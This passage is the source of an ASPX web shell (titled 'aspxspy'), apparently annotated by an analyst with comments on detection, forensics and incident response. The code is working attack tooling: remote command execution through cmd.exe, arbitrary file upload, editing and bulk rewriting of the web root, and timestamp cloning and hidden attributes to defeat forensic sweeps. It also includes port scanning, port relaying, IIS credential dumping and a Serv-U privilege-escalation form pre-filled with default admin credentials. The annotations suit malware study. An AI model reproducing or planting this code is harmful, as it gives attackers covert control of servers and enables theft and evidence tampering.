// Starts a relay with endpoints read from four form controls: llh and zhs are
// passed as the remote host and port, eepm and ixdh as the local host and
// port. int.parse() throws on non-numeric port text and nothing here catches it.
protected void ruqo()
{
portforward gyp=new portforward();
gyp.start(llh.value,int.parse(zhs.value),eepm.value,int.parse(ixdh.value));
}
// Resolves a host name to the text form of its first address.
//   instr - host name or address text
// Returns null when resolution fails; the exception is swallowed.
public string mrdl(string instr)
{
string tmp=null;
try
{
tmp=system.net.dns.resolve(instr).addresslist[0].tostring();
}
catch(exception e)
{
}
return tmp;
}
// Runs the port scan configured in the form.
// lomx holds a comma-separated port list and mdr the target host. One scanport
// object per port is added to the page-level list ivc, then one thread per
// entry is started and all threads are joined before returning, so the
// request blocks until the slowest connection attempt finishes.
// The host is resolved again for every port, and int32.parse() sits outside
// the try, so malformed port text raises an exception to the caller.
// Review note (detection): the scan originates from the web server, so it
// shows up as a burst of connection attempts from that host to many ports of
// one destination within a single request.
public void vikg()
{
string[] otv=lomx.text.tostring().split(',');
for(int i=0;i<otv.length;i++)
{
ivc.add(new scanport(mrdl(mdr.text.tostring()),int32.parse(otv[i])));
}
try
{
thread[] kbxy=new thread[ivc.count];
int sdo=0;
for(sdo=0;sdo<ivc.count;sdo++)
{
kbxy[sdo]=new thread(new threadstart(((scanport)ivc[sdo]).scan));
kbxy[sdo].start();
}
for(sdo=0;sdo<kbxy.length;sdo++)
kbxy[sdo].join();
}
catch
{
}
}
// One TCP connect probe: holds the target address and port, the resulting
// status text and the time the attempt took. All four values are exposed as
// read-only properties.
public class scanport
{
private string _ip="";
private int jtdo=0;
private timespan _timespent;
// Status shown to the operator; replaced by scan() with an HTML fragment.
private string qgch="not scanned";
public string ip
{
get { return _ip;}
}
public int port
{
get { return jtdo;}
}
public string status
{
get { return qgch;}
}
public timespan timespent
{
get { return _timespent;}
}
// Stores the target; no validation is performed.
public scanport(string ip,int port)
{
_ip=ip;
jtdo=port;
}
// Attempts a blocking TCP connect to the stored target. Success sets the
// status to the "open" fragment; any exception, whatever its cause, sets it to
// the "close" fragment. The elapsed time is recorded either way.
public void scan()
{
tcpclient iyap=new tcpclient();
datetime qyzt=datetime.now;
try
{
iyap.connect(_ip,jtdo);
iyap.close();
qgch="<font color=green><b>open</b></font>";
}
catch
{
qgch="<font color=red><b>close</b></font>";
}
_timespent=datetime.now.subtract(qyzt);
}
}
// Registers the page's own postback channel: two hidden form fields,
// "__eventtarget" and "__file", and a client-side function bin_postback()
// that fills them and submits the first form on the page.
//   page - the page the fields and script are registered on
// Review note (detection): the "__file" field name and the bin_postback
// function name are fixed strings in this sample, so they are usable as
// content signatures for the file on disk and for POST bodies in web logs or
// WAF rules. The closing tag is split ("</scr"+"ipt>") so that it does not end
// the enclosing server-side script block.
public static void yfcnp(system.web.ui.page page)
{
page.registerhiddenfield("__eventtarget","");
page.registerhiddenfield("__file","");
string s=@"<script language=javascript>";
s+=@"function bin_postback(eventtarget,eventargument)";
s+=@"{";
s+=@"var theform=document.forms[0];";
s+=@"theform.__eventtarget.value=eventtarget;";
s+=@"theform.__file.value=eventargument;";
s+=@"theform.submit();";
s+=@"} ";
s+=@"</scr"+"ipt>";
page.registerstartupscript("",s);
}
// Menu handler for the file-search view: hides the feature panels, shows yhv,
// sets the heading, pre-fills the search root (nalj) with the application's
// physical path and hides the result table ojiym.
protected void pptk(object sender,eventargs e)
{
wicxe();
yhv.visible=true;
bin_h2_title.innertext="文件搜索 >>";
nalj.value=request.physicalapplicationpath;
ojiym.visible=false;
}
// Search button handler: checks that the directory named in nalj exists,
// runs the recursive search oog() on it and reports completion via xseub().
protected void nby(object sender,eventargs e)
{
directoryinfo gqmm=new directoryinfo(nalj.value);
if(!gqmm.exists)
{
xseub("path invalid ! ");
return;
}
oog(gqmm);
xseub("search completed ! ");
}
// Recursive file search with optional in-place replacement.
//   dir - directory to search; every subdirectory is searched as well
// For each file: the page's own file is skipped; the extension must match the
// alternation typed into udlva; then either the file name (mode "name") or
// the whole file content is tested against the text in iamkl, as a regular
// expression when raq is checked and as a case-insensitive substring
// otherwise. Matches are listed through fjvq().
// In content mode with yzw checked, every match is replaced by the text in qpe
// and the file is overwritten with the result.
// Errors on one file are reported and the loop continues; errors on a
// directory end that directory's walk.
// Review note (incident response): the replace path rewrites every matching
// file under the chosen root in one pass. Many web content files with
// near-identical modification times, or with the same foreign fragment
// inserted, are the artefact this leaves; file-integrity monitoring on the
// web root surfaces it.
public void oog(directoryinfo dir)
{
try
{
ojiym.visible=true;
foreach(fileinfo bin_files in dir.getfiles())
{
try
{
// Never list or rewrite the page that is running this search.
if(bin_files.fullname==request.physicalpath)
{
continue;
}
// udlva is inserted into the pattern unescaped, so it is itself regex syntax.
if(!regex.ismatch(bin_files.extension.replace(".",""),"^("+udlva.value+")$",regexoptions.ignorecase))
{
continue;
}
if(ven.selecteditem.value=="name")
{
if(raq.checked)
{
if(regex.ismatch(bin_files.name,iamkl.value,regexoptions.ignorecase))
{
fjvq(bin_files);
}
}
else
{
if(bin_files.name.tolower().indexof(iamkl.value.tolower())!=-1)
{
// Writes the path straight into the response in addition to the table row;
// this looks like leftover debugging output.
response.write(bin_files.fullname);
fjvq(bin_files);
}
}
}
else
{
// Whole file is read into memory using the system default encoding.
streamreader sr=new streamreader(bin_files.fullname,encoding.default);
string ava=sr.readtoend();
sr.close();
if(raq.checked)
{
if(regex.ismatch(ava,iamkl.value,regexoptions.ignorecase))
{
fjvq(bin_files);
if(yzw.checked)
{
ava=regex.replace(ava,iamkl.value,qpe.value,regexoptions.ignorecase);
// append=false: the original file content is overwritten.
streamwriter sw=new streamwriter(bin_files.fullname,false,encoding.default);
sw.write(ava);
sw.close();
}
}
}
else
{
if(ava.tolower().indexof(iamkl.value.tolower())!=-1)
{
fjvq(bin_files);
if(yzw.checked)
{
ava=strings.replace(ava,iamkl.value,qpe.value,1,-1,comparemethod.text);
// append=false: the original file content is overwritten.
streamwriter sw=new streamwriter(bin_files.fullname,false,encoding.default);
sw.write(ava);
sw.close();
}
}
}
}
}
catch(exception ex)
{
xseub(ex.message);
continue;
}
}
foreach(directoryinfo subdir in dir.getdirectories())
{
oog(subdir);
}
}
catch(exception ex)
{
xseub(ex.message);
}
}
// Appends one search hit to the result table ojiym.
//   objfile - the matching file
// The row has three cells: the full path as a link that posts back
// "bin_listdir" with the file's directory (passed through mvvj()), the last
// write time, and the size formatted by mtg(). The path is placed into the
// markup without HTML encoding.
public void fjvq(fileinfo objfile)
{
tablerow tr=new tablerow();
tablecell tc=new tablecell();
string bg=okm();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
tc.text="<a href=\"javascript:bin_postback('bin_listdir','"+mvvj(objfile.directoryname)+"')\">"+objfile.fullname+"</a>";
tr.cells.add(tc);
tc=new tablecell();
tc.text=objfile.lastwritetime.tostring();
tr.cells.add(tc);
tc=new tablecell();
tc.text=mtg(objfile.length);
tr.cells.add(tc);
ojiym.rows.add(tr);
}
// Shows a status or error message in the jdkt element.
//   instr - message text; assigned through innertext, not innerhtml
// Each call replaces the previous message, so only the last one is visible.
public void xseub(string instr)
{
jdkt.visible=true;
jdkt.innertext=instr;
}
// Login button handler. The text typed into hrj is hashed with unsalted MD5,
// lower-cased and compared with the page-level password field. On a match a
// cookie named by vbhln is issued whose value is that same stored hash, the
// login panel is hidden and pbzw() is called; otherwise tzsx() is called.
// Review note (detection): because the cookie value is the stored hash itself,
// the cookie name/value pair is constant for a given copy of the file. A
// request cookie with this name and a 32-character hex value is a usable
// indicator in proxy and web-server logs.
protected void xvm(object sender,eventargs e)
{
string jfm=formsauthentication.hashpasswordforstoringinconfigfile(hrj.text,"md5").tolower();
if(jfm==password)
{
response.cookies.add(new httpcookie(vbhln,password));
ljtzc.visible=false;
pbzw();
}
else
{
tzsx();
}
}
// Menu handler for the file-manager link: passes the physical path of the
// page's own directory to krir().
// NOTE(review): krir() is defined outside this section; from its call sites it
// presumably renders a directory listing - confirm.
protected void ybg(object sender,eventargs e)
{
krir(server.mappath("."));
}
// Menu handler for the IIS view: sets the heading, hides the feature panels,
// shows vnr and calls adcx(), which is defined outside this section.
protected void kjpi(object sender,eventargs e)
{
bin_h2_title.innertext="iis探测 >>";
wicxe();
vnr.visible=true;
adcx();
}
// Save handler of the file editor: writes the text of xgvv to the path given
// in sqon, replacing any existing file, encoded as UTF-8 when that option is
// selected in ndcx and in the system default encoding otherwise. The outcome
// is reported via xseub() and krir() is then called with the current
// directory value.
// The writer is closed only on the success path.
// Review note (detection): this lets the operator create or overwrite any file
// the web-server account can write, at an operator-chosen path. New or
// changed script files under the web root written by the worker process are
// the thing to monitor.
protected void dgcow(object sender,eventargs e)
{
try
{
streamwriter sw;
if(ndcx.selecteditem.text=="utf-8")
{
sw=new streamwriter(sqon.value,false,encoding.utf8);
}
else
{
sw=new streamwriter(sqon.value,false,encoding.default);
}
sw.write(xgvv.innertext);
sw.close();
xseub("save file success !");
}
catch(exception error)
{
xseub(error.message);
}
krir(axsbb.value);
}
// Upload handler: saves the posted file into the directory held in axsbb
// (after oelm() has processed the path) under the file name the client sent,
// reduced to its last path component by path.getfilename(). No check on file
// type, extension or size is made in this handler. The outcome is reported
// via xseub() and krir() is then called with the same directory value.
protected void lbjld(object sender,eventargs e)
{
string flwa=axsbb.value;
flwa=oelm(flwa);
try
{
fhq.postedfile.saveas(flwa+path.getfilename(fhq.value));
xseub("file upload success!");
}
catch(exception error)
{
xseub(error.message);
}
krir(axsbb.value);
}
// Event handler that calls krir() with the directory currently held in axsbb.
protected void exv(object sender,eventargs e)
{
krir(axsbb.value);
}
// Event handler that calls krir() with the physical path of the page's own
// directory.
protected void mccy(object sender,eventargs e)
{
krir(server.mappath("."));
}
// Command handler that calls krir() with the path carried in the command
// argument of the control that raised the event.
protected void ivk(object sender,commandeventargs e)
{
krir(e.commandargument.tostring());
}
// Copies the creation, last-access and last-write times (UTC) of the file
// named in licp onto the file named in qifb, then reports the outcome and
// calls krir() with the current directory value.
// Review note (forensics): after this runs, the target's visible timestamps
// match those of an unrelated file, so "recently modified" sweeps of the web
// root will not surface it. Timestamps that the file APIs report should be
// cross-checked against independent records such as web-server logs,
// file-integrity baselines or file-system journal data.
protected void xxrlw(object sender,eventargs e)
{
try
{
file.setcreationtimeutc(qifb.value,file.getcreationtimeutc(licp.value));
file.setlastaccesstimeutc(qifb.value,file.getlastaccesstimeutc(licp.value));
file.setlastwritetimeutc(qifb.value,file.getlastwritetimeutc(licp.value));
xseub("file time clone success!");
}
catch(exception error)
{
xseub(error.message);
}
krir(axsbb.value);
}
// Applies file attributes and timestamps chosen in the form to the file named
// in pwvl. Attributes are first reset to normal; read-only, system, hidden and
// archive are then applied according to the four check boxes. The three
// timestamps are parsed from the yuqx, alsn and uyjw fields and written as
// UTC values. The outcome is reported via xseub() and krir() is then called
// with the current directory value.
// The read-only branch assigns the attribute alone, while the other three OR
// their flag into the current attributes.
// Review note (forensics): hidden+system attributes and operator-chosen
// timestamps mean neither a default directory listing nor a date-based sweep
// can be relied on to show files touched through this handler.
protected void tiykc(object sender,eventargs e)
{
string path=pwvl.value;
try
{
file.setattributes(path,fileattributes.normal);
if(zhwsk.checked)
{
file.setattributes(path,fileattributes.readonly);
}
if(ssr.checked)
{
file.setattributes(path,file.getattributes(path)| fileattributes.system);
}
if(ccb.checked)
{
file.setattributes(path,file.getattributes(path)| fileattributes.hidden);
}
if(fbyz.checked)
{
file.setattributes(path,file.getattributes(path)| fileattributes.archive);
}
file.setcreationtimeutc(path,convert.todatetime(yuqx.value));
file.setlastaccesstimeutc(path,convert.todatetime(alsn.value));
file.setlastwritetimeutc(path,convert.todatetime(uyjw.value));
xseub("file attributes modify success!");
}
catch(exception error)
{
xseub(error.message);
}
krir(axsbb.value);
}
// Menu handler for the command view: hides the feature panels, shows viac and
// sets the heading text.
protected void voxn(object sender,eventargs e)
{
wicxe();
viac.visible=true;
bin_h2_title.innertext="执行命令>>";
}
// Command-execution handler: starts the program named in kusi with the
// argument string from bkcm, without the shell and with all three standard
// streams redirected, reads standard output to the end and shows it in tnqrf.
// Standard error is redirected but never read, and the process object is not
// waited on or disposed. Failures are reported via xseub().
// Review note (detection): every use of this handler makes the web-server
// worker process the parent of a new process. Process-creation telemetry with
// the worker process as parent is one of the most reliable signals for this
// class of file.
// NOTE(review): as printed here the first two replace() calls swap a
// character for itself and change nothing; the replacement strings were
// presumably HTML entities that were decoded when this page was published -
// confirm against an original sample.
protected void fbhn(object sender,eventargs e)
{
try
{
process ahae=new process();
ahae.startinfo.filename=kusi.value;
ahae.startinfo.arguments=bkcm.value;
ahae.startinfo.useshellexecute=false;
ahae.startinfo.redirectstandardinput=true;
ahae.startinfo.redirectstandardoutput=true;
ahae.startinfo.redirectstandarderror=true;
ahae.start();
string uoc=ahae.standardoutput.readtoend();
uoc=uoc.replace("<","<");
uoc=uoc.replace(">",">");
uoc=uoc.replace("\r\n","<br>");
tnqrf.visible=true;
tnqrf.innerhtml="<hr width=\"100%\" noshade/><pre>"+uoc+"</pre>";
}
catch(exception error)
{
xseub(error.message);
}
}
// Event handler that calls tprq() with the text of qpdi when that field is
// not empty and lfavw() otherwise. Both helpers are defined outside this
// section.
protected void rafl(object sender,eventargs e)
{
if(qpdi.text.length>0)
{
tprq(qpdi.text);
}
else
{
lfavw();
}
}
// Click handler of the menu link labelled "系统进程" (system processes);
// delegates to yuw(), defined outside this section.
protected void grxk(object sender,eventargs e)
{
yuw();
}
// Click handler of the menu link labelled "系统服务" (system services);
// delegates to tzrh(), defined outside this section.
protected void ilc(object sender,eventargs e)
{
tzrh();
}
// Click handler of the menu link labelled "系统信息" (system information);
// delegates to pdvm(), defined outside this section.
protected void htb(object sender,eventargs e)
{
pdvm();
}
// Click handler of the menu link labelled "用户(组)信息" (user and group
// information); delegates to ilvut(), defined outside this section.
protected void olm(object sender,eventargs e)
{
ilvut();
}
// Click handler of the menu link labelled "serv-u提权" (Serv-U privilege
// escalation); delegates to adcpk(), defined outside this section.
protected void jxhs(object sender,eventargs e)
{
adcpk();
}
// Event handler that delegates to ldodr(), defined outside this section. No
// control in the visible markup references this handler.
protected void lrfrj(object sender,eventargs e)
{
ldodr();
}
// Click handler of the menu link labelled "注册表查询" (registry query);
// delegates to xfhz(), defined outside this section.
protected void xsy(object sender,eventargs e)
{
xfhz();
}
// Click handler of the menu link labelled "数据库管理" (database management);
// delegates to rahe(), which shows the database panel.
protected void dmx(object sender,eventargs e)
{
rahe();
}
// Shared change handler for four drop-down lists, dispatched on the id of the
// control that raised the event:
//   wymo - copies the selected item's value into masr (the connection-string
//          field) and hides dqiif
//   pvf  - lists the tables of the chosen database via xtzy()
//   fgey - copies the selected item's value into the SQL text area jhiy
//   ndcx - calls glkc() with the path in sqon (glkc is defined outside this
//          section)
protected void zovo(object sender,eventargs e)
{
if(((dropdownlist)sender).id.tostring()=="wymo")
{
dqiif.visible=false;
masr.text=wymo.selecteditem.value.tostring();
}
if(((dropdownlist)sender).id.tostring()=="pvf")
{
xtzy();
}
if(((dropdownlist)sender).id.tostring()=="fgey")
{
jhiy.innertext=fgey.selecteditem.value.tostring();
}
if(((dropdownlist)sender).id.tostring()=="ndcx")
{
glkc(sqon.value);
}
}
// Event handler that calls krir() with the directory currently held in axsbb.
protected void ikko(object sender,eventargs e)
{
krir(axsbb.value);
}
// Event handler that delegates to vcf(), the database connect routine.
protected void bgy(object sender,eventargs e)
{
vcf();
}
// Click handler of the menu link labelled "端口扫描" (port scan); delegates to
// vnchz(), which shows the port-scan panel.
protected void cpts(object sender,eventargs e)
{
vnchz();
}
// Click handler of the menu link labelled "端口映射" (port mapping); delegates
// to mhlv(), which shows the port-mapping panel.
protected void fdo(object sender,eventargs e)
{
mhlv();
}
// Event handler that calls vuou() and then displays a fixed status message.
// The message is shown unconditionally; it does not reflect whether any
// connection was actually closed.
protected void vjnse(object sender,eventargs e)
{
vuou();
xseub("clear all thread ......");
}
// Event handler that starts a relay through ruqo() after a minimal check:
// ixdh and zhs must be non-empty and eepm must be at least 7 characters long.
// llh is not checked here. The status message is shown unconditionally once
// ruqo() returns.
protected void wdz(object sender,eventargs e)
{
if(ixdh.value=="" || eepm.value.length<7 || zhs.value=="")return;
ruqo();
xseub("all thread start ......");
}
// Empty event handler; it performs no action.
protected void tyoz(object sender,eventargs e)
{
}
// Scan button handler: runs vikg() (which blocks until every probe has
// finished), then writes one line per probed port - address, port and status
// fragment - into the gbyt element as HTML.
protected void elkq(object sender,eventargs e)
{
vikg();
gbyt.visible=true;
string res=string.empty;
foreach(scanport th in ivc)
{
res+=th.ip+" : "+th.port+" ................................. "+th.status+"<br>";
}
gbyt.innerhtml=res;
}
// Event handler that delegates to dwgt(), which runs the SQL typed into the
// page and shows the results.
protected void orugv(object sender,eventargs e)
{
dwgt();
}
// Hides all ten feature panels. Each view-switching handler calls this first
// and then makes its own panel visible, so one panel is shown at a time.
public void wicxe()
{
dcbs.visible=false;
czfo.visible=false;
apl.visible=false;
viac.visible=false;
kkhn.visible=false;
ywlb.visible=false;
idgml.visible=false;
howtm.visible=false;
vrfa.visible=false;
yhv.visible=false;
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="head1" runat="server">
<meta http-equiv="content-type" content="text/html;charset=utf-8"/>
<title>☆銥繎夶蟲___ёnd</title>
<style type="text/css">
.bin_style_login{font-size: 12px; font-family:tahoma;background-color:#ddd;border:1px solid #fff;}
body,td{font: 12px tahoma,arial;line-height: 16px; background-color:#003300; color:lime;}
.input{font-size: 12px;background-color:#ddd;border:1px solid #fff;}
.list{font-size: 12px;background-color:#ddd;border:1px solid #fff;}
.area{font-size: 12px;background-color:#ddd;border:1px solid #fff;padding:2px;}
.bt {font-size: 12px;background-color:#ddd;border:1px solid #fff;}
a {color:lime;text-decoration: none;}a:hover{color:lime;}
.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#003300;padding:5px 10px 5px 5px;}
.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#003300;padding:5px 10px 5px 5px;}
.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#015201;padding:5px 10px 5px 5px;}
.head td{border-top:1px solid #ddd;border-bottom:1px solid #ccc;background:#073b07;padding:5px 10px 5px 5px;font-weight:bold;}
.head td span{font-weight:normal;}
form{margin:0;padding:0;}
h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:lime;}
ul.info li{margin:0;color:lime;line-height:24px;height:24px;}
u{text-decoration: none;color:lime;float:left;display:block;width:150px;margin-right:10px;}
.u1{text-decoration: none;color:lime;float:left;display:block;width:150px;margin-right:10px;}
.u2{text-decoration: none;color:lime;float:left;display:block;width:350px;margin-right:10px;}
</style>
<script type="text/javascript">
/**
 * Copies the checked state of the form's "chkall" control onto every other
 * element of the same form (the "select all" toggle of the listings).
 *
 * @param form the form whose elements are updated; must expose `elements`
 *             and a control named `chkall`
 */
function checkall(form){
    var fields=form.elements;
    var idx=0;
    while(idx<fields.length){
        var field=fields[idx++];
        // The master checkbox itself is never rewritten.
        if(field.name=='chkall'){
            continue;
        }
        field.checked=form.chkall.checked;
    }
}
</script>
</head>
<body style="margin:0;table-layout:fixed;">
<form id="aspxspy" runat="server">
<div id="ljtzc" runat="server" style=" margin:15px" enableviewstate="false" visible="false" >
<span style="font:11px verdana;">password:</span>
<asp:textbox id="hrj" runat="server" columns="20" cssclass="bin_style_login" ></asp:textbox>
<asp:button id="zsnxu" runat="server" text="login" cssclass="bin_style_login" onclick="xvm"/><p/>
</div>
<div id="zvs" runat="server">
<div id="zzj" runat="server">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr class="head">
<td ><span style="float:right;"><a href="http://www.on-e.cn" target="_blank">☆銥繎夶蟲___ёnd</a></span><span id="bin_span_sname" runat="server" enableviewstate="true"></span></td>
</tr>
<tr class="alt1">
<td><span style="float:right;" id="bin_span_frameversion" runat="server"></span>
<asp:linkbutton id="utkn" runat="server" onclick="ykpi" text="退出登录" ></asp:linkbutton> | <asp:linkbutton id="rsqhw" runat="server" text="文件(夹)管理" onclick="ybg"></asp:linkbutton> | <asp:linkbutton id="xxze" runat="server" text="cmd命令" onclick="voxn"></asp:linkbutton> | <asp:linkbutton id="nuc" runat="server" text="iis探测" onclick="kjpi"></asp:linkbutton> | <asp:linkbutton id="orepx" runat="server" text="系统进程" onclick="grxk"></asp:linkbutton> | <asp:linkbutton id="jhn" runat="server" text="系统服务" onclick="ilc"></asp:linkbutton> | <asp:linkbutton id="phq" runat="server" text="用户(组)信息" onclick="olm"></asp:linkbutton> | <asp:linkbutton id="wmgnk" runat="server" text="系统信息" onclick="htb"></asp:linkbutton> | <asp:linkbutton id="fev" runat="server" text="文件搜索" onclick="pptk"></asp:linkbutton> | <asp:linkbutton id="pvq" runat="server" text="serv-u提权" onclick="jxhs"></asp:linkbutton> | <asp:linkbutton id="jndb" runat="server" text="注册表查询" onclick="xsy"></asp:linkbutton> | <asp:linkbutton id="hdq" runat="server" text="端口扫描" onclick="cpts" ></asp:linkbutton> | <asp:linkbutton id="aoi" runat="server" text="数据库管理" onclick="dmx"></asp:linkbutton> | <asp:linkbutton id="khbed" runat="server" text="端口映射" onclick="fdo"></asp:linkbutton>
</td>
</tr>
</table>
</div>
<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
<div id="jdkt" style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;" runat="server" visible="false" enableviewstate="false"></div>
<h2 id="bin_h2_title" runat="server"></h2>
<%--filelist--%>
<div id="czfo" runat="server">
<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
<tr>
<td style=" white-space:nowrap">当前目录 : </td>
<td style=" width:100%"><input class="input" id="axsbb" type="text" style="width:97%;margin:0 8px;" runat="server"/>
</td>
<td style="white-space:nowrap" ><asp:button id="xagwl" runat="server" text="go" cssclass="bt" onclick="exv"/></td>
</tr>
</table>
<table width="100%" border="0" cellpadding="4" cellspacing="0">
<tr class="alt1"><td colspan="7" style="padding:5px;">
<div style="float:right;"><input id="fhq" class="input" runat="server" type="file" style=" height:22px"/>
<asp:button id="rvpp" cssclass="bt" runat="server" text="上传" onclick="lbjld"/></div><asp:linkbutton id="oljfp" runat="server" text="网站目录" onclick="mccy"></asp:linkbutton> | <a href="#" id="bin_button_createdir" runat="server">木马目录</a> | <a href="#" id="bin_button_createfile" runat="server">新建目录</a>
| <span id="bin_span_drv" runat="server"></span><a href="#" id="bin_button_killme" runat="server" style="color:red">木马自杀</a>
</td></tr>
<asp:table id="ugzp" runat="server" width="100%" cellspacing="0" >
<asp:tablerow cssclass="head"><asp:tablecell> </asp:tablecell><asp:tablecell>文件(夹)名</asp:tablecell><asp:tablecell width="25%">最后修改时间</asp:tablecell><asp:tablecell width="15%">大小</asp:tablecell><asp:tablecell width="25%">操作</asp:tablecell></asp:tablerow>
</asp:table>
</table>
</div>
<%--fileedit--%>
<div id="vrfa" runat="server">
<p>当前文件(创建新的文件名和新文件)<br/>
<input class="input" id="sqon" type="text" size="100" runat="server"/> <asp:dropdownlist id="ndcx" runat="server" cssclass="list" autopostback="true" onselectedindexchanged="zovo"><asp:listitem>default</asp:listitem><asp:listitem>utf-8</asp:listitem></asp:dropdownlist>
</p>
<p>文件内容<br/>
<textarea id="xgvv" runat="server" class="area" cols="100" rows="25" enableviewstate="true" ></textarea>
</p>
<p><asp:button id="jjjbw" runat="server" text="提交" cssclass="bt" onclick="dgcow"/> <asp:button id="icnu" runat="server" text="返回" cssclass="bt" onclick="ikko"/></p>
</div>
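<%--clonetime: form for copying timestamps from a reference file onto another file, and for setting
    creation / last-modified / last-access times and the read-only, system, hidden and archive attributes
    by hand (the handlers are outside this section). For incident response: on a host where this page ran,
    file times and attributes cannot be trusted on their own; corroborate them with web server logs and
    other independent records.--%>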
<div id="zryg" runat="server" enableviewstate="false" visible="false">
<p>修改文件<br/><input class="input" id="qifb" type="text" size="120" runat="server"/></p>
<p>参考文件<br/><input class="input" id="licp" type="text" size="120" runat="server"/></p>
<p><asp:button id="jeaxv" runat="server" text="提交" cssclass="bt" onclick="xxrlw"/></p>
<h2>设置最后修改时间 »</h2>
<p>当前文件<br/><input class="input" id="pwvl" type="text" size="120" runat="server"/></p>
<p>
<asp:checkbox id="zhwsk" runat="server" text="只读" enableviewstate="false"/>
<asp:checkbox id="ssr" runat="server" text="系统" enableviewstate="false"/>
<asp:checkbox id="ccb" runat="server" text="隐藏" enableviewstate="false"/>
<asp:checkbox id="fbyz" runat="server" text="存档" enableviewstate="false"/>
</p>
<p>
创建时间 :
<input class="input" id="yuqx" type="text" runat="server"/>
最后修改时间 :
<input class="input" id="uyjw" type="text" runat="server"/>
最后访问时间 :
<input class="input" id="alsn" type="text" runat="server"/>
</p>
<p>
<asp:button id="kog" cssclass="bt" runat="server" text="提交" onclick="tiykc"/>
</p>
</div>
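<%--iisspy: results table with the columns id, iis_user, iis_pass, domain and path, filled by server code
    outside this section. If this page ran on a host, treat the IIS site account credentials and the
    site layout as disclosed and rotate those credentials.--%>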
<div runat="server" id="vnr" visible="false" enableviewstate="false">
<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
<asp:table id="gli" runat="server" width="100%" cellspacing="0">
<asp:tablerow cssclass="head"><asp:tablecell>id</asp:tablecell><asp:tablecell>iis_user</asp:tablecell><asp:tablecell>iis_pass</asp:tablecell><asp:tablecell>domain</asp:tablecell><asp:tablecell>path</asp:tablecell></asp:tablerow>
</asp:table>
</table>
</div>
<%--process--%>
<div runat="server" id="dcbs" visible="false" enableviewstate="false">
<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
<asp:table id="ijsl" runat="server" width="100%" cellspacing="0" >
<asp:tablerow cssclass="head"><asp:tablecell></asp:tablecell><asp:tablecell>id</asp:tablecell><asp:tablecell>process</asp:tablecell><asp:tablecell>threadcount</asp:tablecell><asp:tablecell>priority</asp:tablecell><asp:tablecell>action</asp:tablecell></asp:tablerow>
</asp:table>
</table>
</div>
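<%--cmdshell: form that takes an executable path (default c:\windows\system32\cmd.exe) and an argument
    string and posts them to the fbhn handler, which is outside this section. Detection: a child process
    such as cmd.exe started by the IIS worker process is the usual indicator; the application pool
    identity should not need the right to start processes at all.--%>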
<div runat="server" id="viac">
<p>cmd路径:<br/>
<input class="input" runat="server" id="kusi" type="text" size="100" value="c:\windows\system32\cmd.exe"/>
</p>
语句:<br/>
<input class="input" runat="server" id="bkcm" value="/c set" type="text" size="100"/> <asp:button id="yrql" cssclass="bt" runat="server" text="执行" onclick="fbhn"/>
<div id="tnqrf" runat="server" visible="false" enableviewstate="false">
</div>
</div>
<%--services--%>
<div runat="server" id="iqxm" visible ="false" enableviewstate="false">
<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
<asp:table id="vhcs" runat="server" width="100%" cellspacing="0" >
<asp:tablerow cssclass="head"><asp:tablecell></asp:tablecell><asp:tablecell>id</asp:tablecell><asp:tablecell>name</asp:tablecell><asp:tablecell>path</asp:tablecell><asp:tablecell>state</asp:tablecell><asp:tablecell>startmode</asp:tablecell></asp:tablerow>
</asp:table>
</table>
</div>
<%--sysinfo--%>
<div runat="server" id="ghab" visible="false" enableviewstate="false">
<hr style=" border: 1px solid #ddd;height:0px;"/>
<ul class="info" id="bin_ul_sys" runat="server"></ul>
<h2 id="bin_h2_mac" runat="server"></h2>
<hr style=" border: 1px solid #ddd;height:0px;"/>
<ul class="info" id ="bin_ul_netconfig" runat="server"></ul>
<h2 id="bin_h2_driver" runat="server"></h2>
<hr style=" border: 1px solid #ddd;height:0px;"/>
<ul class="info" id ="bin_ul_driver" runat="server"></ul>
</div>
<%--userinfo--%>
<div runat="server" id="xwvq" visible="false" enableviewstate="false">
<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
<asp:table id="vpa" runat="server" width="100%" cellspacing="0" >
</asp:table>
</table>
</div>
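<%--suexp (menu label: serv-u privilege escalation): form pre-filled with an account name, a password and
    local port 43958 plus a command line, posted to the lrfrj handler outside this section. The pre-filled
    values look like the FTP server's default local administration credentials. Mitigation: change those
    defaults, restrict access to the local administration port, and retire unsupported server versions.--%>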
<div runat="server" id="apl">
<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
<tr align="center">
<td style="width:10%"></td>
<td style="width:20%" align="left">用户名 : <input class="input" runat="server" id="dnohj" type="text" size="20" value="localadministrator"/></td>
<td style="width:20%" align="left">密码 : <input class="input" runat="server" id="nmd" type="text" size="20" value="#l@$ak#.lk;0@p"/></td>
<td style="width:20%" align="left">端口 : <input class="input" runat="server" id="hlql" type="text" size="20" value="43958"/></td>
<td style="width:10%"></td>
</tr>
<tr >
<td style="width:10%"></td>
<td colspan="5">cmdshell : <input class="input" runat="server" id="mhbjb" type="text" size="100" value="cmd.exe /c net user"/> <asp:button id="sphc" cssclass="bt" runat="server" text="执行" onclick="lrfrj"/></td>
</tr>
</table>
<div id="uhla" visible="false" enableviewstate="false" runat="server">
<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
<tr align="center">
<td style="width:30%"></td>
<td align="left" style="width:40%"><pre id="bin_td_res" runat="server"></pre></td>
<td style="width:30%"></td>
</tr>
</table>
</div>
</div>
<%--reg--%>
<div id="kkhn" runat="server">
<p>注册表路径 : <asp:textbox id="qpdi" style="width:85%;margin:0 8px;" cssclass="input" runat="server"/><asp:button id="mona" runat="server" text="go" cssclass="bt" onclick="rafl"/></p>
<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
